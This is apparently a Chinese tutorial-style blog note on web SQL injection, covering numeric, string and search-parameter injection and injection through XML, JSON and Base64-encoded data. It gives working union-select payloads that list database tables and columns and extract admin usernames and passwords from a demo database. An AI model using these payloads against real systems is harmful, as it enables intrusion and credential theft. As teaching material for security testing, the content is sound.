当前位置: 首页 > wzjs >正文

视频网站 外链广东seo价格是多少钱

视频网站 外链,广东seo价格是多少钱,温州网站建设honmau,南宁哪个公司做网站建设知识点: 1、Web攻防-SQL注入-参数类型&参数格式 2、Web攻防-SQL注入-XML&JSON&BASE64等 3、Web攻防-SQL注入-数字字符搜索等符号绕过 案例说明: 在应用中,存在参数值为数字,字符时,符号的介入&#xff0c…

知识点:
1、Web攻防-SQL注入-参数类型&参数格式
2、Web攻防-SQL注入-XML&JSON&BASE64等
3、Web攻防-SQL注入-数字字符搜索等符号绕过

案例说明:
在应用中,存在参数值为数字,字符时,符号的介入,另外搜索功能通配符的再次介入,另外传输数据可由最基本的对应赋值传递改为更加智能的XMLJSON格式传递,部分保证更安全的情况还会采用编码或加密形式传递数据,给于安全测试过程中更大的挑战和难度。

一、演示案例-WEB攻防-SQL注入-参数类型&符号干扰

需要考虑闭合问题
在这里插入图片描述

数字

select * from news where id=$id; 

在这里插入图片描述
在这里插入图片描述

字符

select * from news where name='$name'; 

在这里插入图片描述
在这里插入图片描述

搜索

select * from news where name like '%name%';
符号干扰:有无单引号或双引号及通配符等

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

%' order by 3#

在这里插入图片描述

%' union select 1,2,3#

在这里插入图片描述
在这里插入图片描述
知道数据库名:news_db

获取数据库名下的表名信息:
借助自带的information_schema.tables表(记录所有数据库名下的表名)

1%' union select 1,2,table_name from information_schema.tables where table_schema='news_db'#

在这里插入图片描述
admin表名下的列名
借助自带的information_schema.columns表(记录所有数据库名下的表名对应的列名信息)

1%' union select 1,2,column_name from information_schema.columns where table_schema='news_db' and table_name='admin'#

在这里插入图片描述
查询列名相关数据

1%' union select 1,username,password from admin#

在这里插入图片描述

二、演示案例-WEB攻防-SQL注入-参数格式&参数编码

1、数据传输采用XML或JSON格式传递
2、数据传输采用编码或加密形式传递
3、数据传递采用JSON又采用编码传递

XML

<?xml version="1.0" encoding="UTF-8"?>
<news><article><id>1</id><title>xiaodi</title><content>i am xiaodi</content><created_at>2025-03-07</created_at></article><article><id>2</id><title>xiaodisec</title><content>i am xiaodisec</content><created_at>2025-03-06</created_at></article>
</news>

在这里插入图片描述
在这里插入图片描述

JSON

{"news:"[
{"id": 1,"title": "xiaodi","content": "i am xiaodi","created_at": "2025-03-07"
},
{"id": 2,"title": "xiaodisec","content": "i am xiaodisec","created_at": "2025-03-06"
}]
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64

{"news": [
{"id": "MQ==","title": "eGlhb2Rp","content": "aSBhbSB4aWFvZGk=","created_at": "MjAyNS0wMy0wNw=="
},
{"id": "Mg==","title": "eGlhb2Rpc2Vj","content": "aSBhbSB4aWFvZGlzZWM=","created_at": "MjAyNS0wMy0wNg=="
}]
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实例应用-编码注入案例

https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ

http://www.dtcms.com/wzjs/133590.html

相关文章:

  • 湖北省建设厅行政审批网站免费域名 网站
  • b2b2c平台网站建设微信小程序怎么开通
  • 漳州手机网站建设sem和seo是什么职业岗位
  • 网站建设案例效果免费b站推广网站
  • 服装网站源码php宜兴网站建设
  • 小加工厂做网站下载浏览器
  • 网站建设需要掌握什么知识成都建设网官网
  • 西宁网络公司网站建设百度搜索引擎广告位的投放
  • 医院图书馆网站建设的意义百度地图推广
  • 如何用魔方网表做门户网站线上推广的渠道和方法
  • 婚纱动态网站模板网站排名查询
  • 武汉 光谷 网站建设免费b站推广网站入口202
  • 长沙县 网站建设网站流量查询平台
  • 上海建设牌电动三轮官方网站天眼查企业查询入口
  • 百度推广做的网站可以用吗平台优化
  • 广州网站开发报价关键词搜索热度
  • 做电子购物网站需要申请怎样制作网站教程
  • 优秀企业网站欣赏店名设计上海网站建设咨询
  • 景德镇做网站哪家好广州网站优化
  • 泉州网站建设公司推荐品牌推广内容
  • 东莞市手机网站建设怎么样网站关键词快速排名软件
  • 企业网站需求文档销售管理
  • 西安网站建设服务社区推广方法有哪些
  • 怎么做网站的内链外链排名怎么优化快
  • 排名优化网站建设精准数据营销方案
  • 杭州酒店团购网站建设百度订单售后电话
  • 视频类的网站制作邀请注册推广赚钱的app
  • 手机免费建设网站乌鲁木齐seo
  • 深圳做营销网站的公司南阳本地网络推广优化公司
  • 有专门做宝宝用品的网站吗常用的网络营销策略有哪些